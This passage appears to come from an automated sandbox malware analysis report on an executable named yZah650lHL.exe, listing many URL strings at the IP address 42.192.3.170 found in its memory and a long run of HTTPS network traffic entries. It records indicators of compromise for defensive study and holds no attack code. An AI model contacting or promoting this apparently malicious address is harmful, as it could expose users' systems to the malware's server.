00000000.00000003.2270174330.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2383203450.00000000007EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/dpixel)
          Source: yZah650lHL.exe, 00000000.00000003.2176453491.0000000000793000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/dpixel)X
          Source: yZah650lHL.exe, 00000000.00000003.2913198165.00000000007BA000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1851666148.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2894333153.00000000007BA000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2440141638.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1832985511.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1813737040.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2476981159.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2176453491.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2553907934.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2630411066.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2039906619.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2856843273.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2572561886.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2458872458.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2495218353.00000000007EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/dpixel0
          Source: yZah650lHL.exe, 00000000.00000003.2402005752.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2991067107.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2420730874.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2440141638.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1963443471.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3487466252.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2970624866.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2950128022.0000000000793000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/dpixel1b87bd06
          Source: yZah650lHL.exe, 00000000.00000003.3328362680.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3132490030.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3347918530.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3031504097.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3071146501.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3369785762.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3407302077.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3448145276.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3308921920.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3051164954.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3427840081.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2176453491.00000000007EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/dpixel1b87bd063
          Source: yZah650lHL.exe, 00000000.00000002.4113948673.0000000000793000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/dpixel3$
          Source: yZah650lHL.exe, 00000000.00000002.4113948673.0000000000761000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/dpixel7
          Source: yZah650lHL.exe, 00000000.00000003.2251319946.0000000000793000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/dpixel8s
          Source: yZah650lHL.exe, 00000000.00000003.3132490030.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1719918734.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1832985511.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3407302077.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1813737040.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2630411066.00000000007EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/dpixel9
          Source: yZah650lHL.exe, 00000000.00000003.1944793809.00000000007A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/dpixel;X
          Source: yZah650lHL.exe, 00000000.00000003.2251319946.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2058516201.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1888943587.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2021019035.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2402005752.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1851666148.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1870269974.00000000007ED000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2894333153.00000000007BA000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1832985511.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000002.4114142159.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3407302077.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1813737040.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1907581606.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1982892951.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1944932015.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2232239149.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1963443471.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2002388791.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2630411066.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2970624866.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3094866758.0000000000793000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/dpixel=#
          Source: yZah650lHL.exe, 00000000.00000003.2420730874.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1982892951.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2176453491.0000000000793000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/dpixelBX
          Source: yZah650lHL.exe, 00000000.00000003.2288370778.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1944793809.00000000007A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/dpixelGX
          Source: yZah650lHL.exe, 00000000.00000003.3153029603.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3191073968.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000002.4114142159.00000000007EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/dpixelHG
          Source: yZah650lHL.exe, 00000000.00000003.3153029603.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3369785762.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3487466252.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2950128022.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3271622558.0000000000793000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/dpixelHP
          Source: yZah650lHL.exe, 00000000.00000003.1739759155.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1719918734.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1944932015.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1963443471.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1701127794.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2176453491.00000000007EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/dpixelM
          Source: yZah650lHL.exe, 00000000.00000003.3308921920.00000000007EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/dpixelP
          Source: yZah650lHL.exe, 00000000.00000003.1963443471.00000000007EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/dpixelQ
          Source: yZah650lHL.exe, 00000000.00000002.4113948673.0000000000761000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/dpixelS
          Source: yZah650lHL.exe, 00000000.00000003.3031504097.0000000000793000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/dpixelXu
          Source: yZah650lHL.exe, 00000000.00000003.3328362680.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1739759155.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3347918530.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1758268591.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3369785762.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2894333153.00000000007BA000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1719918734.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3407302077.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3250525186.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3448145276.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3467626542.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1776453698.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2950128022.0000000000793000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/dpixela
          Source: yZah650lHL.exe, 00000000.00000003.3467626542.0000000000793000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/dpixelcs
          Source: yZah650lHL.exe, 00000000.00000003.3011079051.0000000000793000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/dpixelhK
          Source: yZah650lHL.exe, 00000000.00000003.1870269974.00000000007ED000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3308921920.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3487466252.0000000000793000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/dpixelm
          Source: yZah650lHL.exe, 00000000.00000003.2913198165.00000000007BA000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3230732408.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3427840081.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3211424591.0000000000793000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/dpixelp
          Source: yZah650lHL.exe, 00000000.00000003.3230732408.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2325663976.00000000007EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/dpixelphy
          Source: yZah650lHL.exe, 00000000.00000003.2251319946.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2288485933.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2232239149.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1963443471.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2553907934.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2270174330.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2383203450.00000000007EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/dpixelq
          Source: yZah650lHL.exe, 00000000.00000003.1870269974.00000000007ED000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1832985511.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3113705174.0000000000793000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/dpixelt
          Source: yZah650lHL.exe, 00000000.00000003.2856843273.00000000007EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/dpixeltem32
          Source: yZah650lHL.exe, 00000000.00000003.2495218353.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1944793809.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2058516201.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2077887934.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2364365771.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2476981159.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2232239149.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2553907934.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2440036654.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2021019035.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2420730874.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2345864498.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2288370778.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1982892951.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2325663976.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2458872458.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2251319946.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2039804636.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2176453491.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2572561886.0000000000793000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/dpixeltz
          Source: yZah650lHL.exe, 00000000.00000003.3347918530.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2991067107.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3171943866.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3407302077.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3448145276.0000000000793000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/dpixelxJ
          Source: yZah650lHL.exe, 00000000.00000003.2251319946.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2288485933.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2345864498.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2402005752.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2420730874.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2306808221.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2440141638.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1832985511.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2325663976.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2364539586.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2476981159.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2458872458.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2270174330.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2495218353.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2383203450.00000000007EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/dpixely
          Source: yZah650lHL.exe, 00000000.00000003.3427840081.0000000000793000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/dpixelz
          Source: yZah650lHL.exe, 00000000.00000003.3230732408.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2440141638.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1719918734.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000002.4114142159.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3250525186.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2476981159.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2176453491.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2553907934.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2856843273.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2572561886.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2458872458.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2495218353.00000000007EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/nd-point:
          Source: yZah650lHL.exe, 00000000.00000003.2383203450.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1926725987.00000000007EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/pixel
          Source: yZah650lHL.exe, 00000000.00000003.1758268591.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1776453698.00000000007EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/pixel(
          Source: yZah650lHL.exe, 00000000.00000003.3153029603.0000000000793000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/pixel0
          Source: yZah650lHL.exe, 00000000.00000003.1739759155.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1758268591.00000000007EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/pixel1b87bd06
          Source: yZah650lHL.exe, 00000000.00000003.3153029603.0000000000793000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/pixel9
          Source: yZah650lHL.exe, 00000000.00000003.2176453491.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2553907934.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2572561886.00000000007EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/pixelLMEM8x
          Source: yZah650lHL.exe, 00000000.00000003.1758268591.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1794973018.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1776453698.00000000007EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/pixelM
          Source: yZah650lHL.exe, 00000000.00000003.2021019035.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1982892951.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2002388791.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2039906619.00000000007EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/pixelQ
          Source: yZah650lHL.exe, 00000000.00000003.2058516201.00000000007EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/pixelq
          Source: yZah650lHL.exe, 00000000.00000003.1739905253.00000000007C1000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1739847137.00000000007B9000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1719801648.00000000007B9000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000002.4114142159.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1907581606.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3487466252.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1719918734.00000000007C1000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1758268591.00000000007B9000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1926725987.00000000007EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/ptography
          Source: yZah650lHL.exe, 00000000.00000003.2270174330.00000000007B9000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2251319946.0000000000793000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/vide
          Source: yZah650lHL.exe, 00000000.00000003.2440141638.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3427840081.0000000000793000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/xel
          Source: yZah650lHL.exe, 00000000.00000003.1851666148.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1832985511.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1813737040.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1794973018.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1776453698.00000000007EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/y
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50058
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50057
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50059
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50061
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50060
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50063
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50062
          Source: unknownNetwork traffic detected: HTTP traffic on port 50068 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50102 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50125 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
          Source: unknownNetwork traffic detected: HTTP traffic on port 50085 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
          Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50065
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50064
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50067
          Source: unknownNetwork traffic detected: HTTP traffic on port 50091 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50113 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50066
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50069
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50068
          Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50070
          Source: unknownNetwork traffic detected: HTTP traffic on port 50107 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50071
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50074
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50073
          Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
          Source: unknownNetwork traffic detected: HTTP traffic on port 50120 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50076
          Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50075
          Source: unknownNetwork traffic detected: HTTP traffic on port 50057 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50078
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50077
          Source: unknownNetwork traffic detected: HTTP traffic on port 50114 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50079
          Source: unknownNetwork traffic detected: HTTP traffic on port 50096 -> 443
